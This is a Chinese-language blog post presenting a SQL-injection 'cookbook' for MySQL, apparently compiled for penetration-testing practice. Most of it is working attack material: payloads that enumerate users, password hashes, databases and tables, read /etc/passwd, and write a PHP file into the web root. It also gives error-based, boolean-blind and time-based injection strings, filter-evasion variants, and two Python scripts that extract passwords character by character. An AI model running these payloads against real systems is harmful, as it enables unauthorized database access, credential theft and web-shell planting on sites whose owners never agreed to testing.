SQL-Injection “CookBook”(Based)(手册基础版)
in Pentest with 1 comment

SQL-Injection “CookBook”(Based)(手册基础版)

in Pentest with 1 comment

不完整,有时间调整格式和继续添加完善,来自p0表哥的整理,后期会详细添加,争取更完善,再加上过waf的一篇。

mysql

当前用户: user()
数据库版本:version()
数据库名:database()
操作系统:@@version_compile_os

查看所有用户
select group_concat(user) from mysql.user
用户hash:
select group_concat(password) from mysql.user where user = 'root'
所有数据库:
select group_concat(schema_name) from information_schema.schemata
表名:
select group_concat(table_name) from information_schema.tables where table_schema = '数据库名'
//表中有主码约束,非空约束等完整性约束条件才能用这个语句查询
select group_concat(table_name) from information_schema.table_constraints where table_schema = '库名'
字段名:
select group_concat(column_name) from information_schema.columns where table_name = '表名'
读文件:
select load_file('/etc/passwd')
写文件:
select "<?php phpinfo();?>" into outfile '/var/www/html/shell.php'

union注入

1,order by x
2,union select 1,2,3 ...
完整的SQL语句:
select * from users where id ='1' and 1=2 union select 1,2,(select user());--+'

利用开头的爆各种信息的语句可进行注入。

基于报错

mysql报错注入:

floor函数报错注入。

floor()函数:向下舍入为指定小数

mysql> select *from users where id =1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
1062 - Duplicate entry 'root@localhost1' for key 'group_key'
mysql>

使用extractvalue()函数报错注入(有长度限制,最长32位)

extractvalue()函数:对XML文档进行查询和修改

mysql> select * from users where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
1105 - XPATH syntax error: '~root@localhost~'
mysql>

updatexml()函数(有长度限制,最长32位)

updatexml():对XML文档进行查询和修改

mysql> select * from users where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
1105 - XPATH syntax error: '~root@localhost~'
mysql>

geometrycollection()

geometrycollection是由1个或多个任意类几何对象构成的几何对象

mysql> select * from users where id=1 and geometrycollection((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql> 

multipoint()

multipoint():Construct MultiPoint from Point values

mysql> select * from users where id=1 and multipoint((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql>

polygon()

polygon():查找指定范围内的点。

mysql> select * from users where id=1 and polygon((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql>

multipolygon()

mysql> select * from users where id=1 and multipolygon((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql>

linestring()

mysql> select * from users where id=1 and linestring((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql>

multilinestring()

mysql> select * from users where id=1 and multilinestring((select * from(select * from(select user())a)b));
1367 - Illegal non geometric '(select `b`.`user()` from (select 'root@localhost' AS `user()` from dual) `b`)' value found during parsing
mysql>

exp() (5.5.5以上)

exp():返回e的x次方 

mysql> select * from users where id=1 and exp(~(select * from(select user())a));
1690 - DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
mysql>

基于布尔的盲注

花式布尔条件的构造:

//正常情况
'or bool#
true'and bool#

//不使用空格、注释
'or(bool)='1
true'and(bool)='1

//不使用or、and、注释
'^!(bool)='1
'=(bool)='
'||(bool)='1
true'%26%26(bool)='1
'=if((bool),1,0)='0

//不使用等号、空格、注释
'or(bool)<>'0
'or((bool)in(1))or'0

//其他
or (case when (bool) then 1 else 0 end)

1' or (bool) or '1'='1
1%' and (bool) or 1=1 and '1'='1

构造逻辑判断

逻辑判断常见函数:
left(user(),1)>'r'
right(user(),1)>'r'
substr(user(),1,1)='r'
mid(user(),1,1)='r'

//不使用逗号
user() regexp '^[a-z]'
user() like 'root%'
POSITION('root' in user())
mid(user() from 1 for 1)='r'
mid(user() from 1)='r'

常规python 布尔型注入脚本

#/usr/bin/evn python
# _*_ coding:utf-8 _*_
import requests
import sys
url = "http://127.0.0.1/sqli/?id=5";
data = "1234567890abcdefghijklmnopqrstuvwxyz@ABCDEFGHIJKLMNOPQRSTUVWXYZ"
payload ="' and ascii(substring((select password from users where id =1),{0},1)) = {1} %23"
password=""
for i in range(1,32):
    for j in data:
        j= ord(j)
        exp = url+payload.format(i,j)
        res = requests.get(exp)
        if "You are in" in res.text:
            password+=chr(j)
            print password

order by型的盲注

场景是一些情况下登陆时如用户名存在注入,除了可以万能密码,基于时间盲注(函数被过滤)。还可以利用order by 进行布尔型盲注。

mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 5                                |
|  1 | admin    | 5f4dcc3b5aa765d61d8327deb882cf99 |
+----+----------+----------------------------------+
2 rows in set
mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 5f4dcc3b5aa765d61d8327deb882cf99 |
|  1 | 2        | 6                                |
+----+----------+----------------------------------+
2 rows in set
mysql>

进行order by型的盲注脚本.

#!/usr/bin/evn python
#_*_ coding:utf-8 _*_
import requests
url = "http://127.0.0.1/order_by_blind.php";
exploit = "' or 1 union select 1,2,'{0}{1}' order by 3 #"
payloads = "0123456789abcdefghijklmnopqrstuvwxyz"
passwd = ""
for i in range(1,32):
    for p in payloads:
        #print p
        exp = exploit.format(passwd,p)
        data = {"uname": exp, "passwd": "drop"}
        res = requests.post(url, data=data)
        #print exp
        if "password error!" in res.text:
            passwd += chr(ord(p) - 1)
            print passwd
        else:
            continue

基于时间的盲注

场景:由于一些存在数据库查询数据输入输出的页面没有任何回显和布尔的回显。可以利用时间延迟来判断布尔。
一般来说,可以布尔盲住的也可以时间盲住。区别就是在盲住的时候加入一些条件判断和时间延迟函数。
一般格式:
if((bool),sleep(3),0)
or (case when (bool) then sleep(3) else 0 end)

两个时间延迟函数:
BENCHMARK(100000,md5(1): 用于测试函数的性能。执行md5(1)函数100000次
sleep(3)

mysql注入符:

/ .... /

`
;%00

insert 和 update型注入

insert和update一般使用报错注入:

mysql> insert into users values(16,"dr0op",'dr0op' and updatexml(1,concat(0x7e,user(),0x7e),1));
1105 - XPATH syntax error: '~root@localhost~'
mysql>

如果没有错误回显,insert可以使用延时注入:
update可以使用bool盲注和延时注入

报错注入

mysql> update emails set email_id = 'dr0op@qq.com' or updatexml(1,concat(0x7e,user(),0x7e),1) where id =7;
1105 - XPATH syntax error: '~root@localhost~'
mysql>

使用子查询报错注入

mysql> update emails set email_id = 'dr0op@qq.com' and (select updatexml(1,concat(0x7e,user(),0x7e),1));
1105 - XPATH syntax error: '~root@localhost~'
mysql>

order by 后的盲注

基于报错注入

mysql> select * from users order by 1 and extractvalue(1,concat(0x7e,user(),0x7e));
1105 - XPATH syntax error: '~root@localhost~'
mysql>

基于布尔盲注

mysql> select * from users order by if(1,1,(select 1 union select 2));
+----+----------+----------------------+
| id | username | password             |
+----+----------+----------------------+
|  1 | Dumb     | Dumb                 |
|  2 | Angelina | I-kill-you           |
|  3 | Dummy    | p@ssword             |
|  4 | secure   | crappy               |
|  5 | stupid   | stupidity            |
|  6 | superman | genious              |
|  7 | batman   | mob!le               |
|  8 | admin    | admin                |
|  9 | admin1   | admin1               |
| 10 | admin2   | admin2               |
| 11 | admin3   | admin3               |
| 12 | dhakkan  | dumbo                |
| 14 | admin4   | admin4               |
| 15 | test     | g98fsadasdvfdsrgsdin |
+----+----------+----------------------+
14 rows in set
mysql> select * from users order by if(0,1,(select 1 union select 2));
1242 - Subquery returns more than 1 row
mysql>

基于时间延迟(不推荐)

order by if(1,sleep(3),0);

表名可控注入

表名不完全可控且DESC的表名含有identifier quote,SELECT的表名不含identifier quote的情况.

http://www.yulegeyu.com/2017/04/16/%E5%BD%93%E8%A1%A8%E5%90%8D%E5%8F%AF%E6%8E%A7%E7%9A%84%E6%B3%A8%E5%85%A5%E9%81%87%E5%88%B0%E4%BA%86Describe%E6%97%B6%E7%9A%84%E5%87%A0%E7%A7%8D%E6%83%85%E5%86%B5%E3%80%82/

Responses
  1. 真详细

    Reply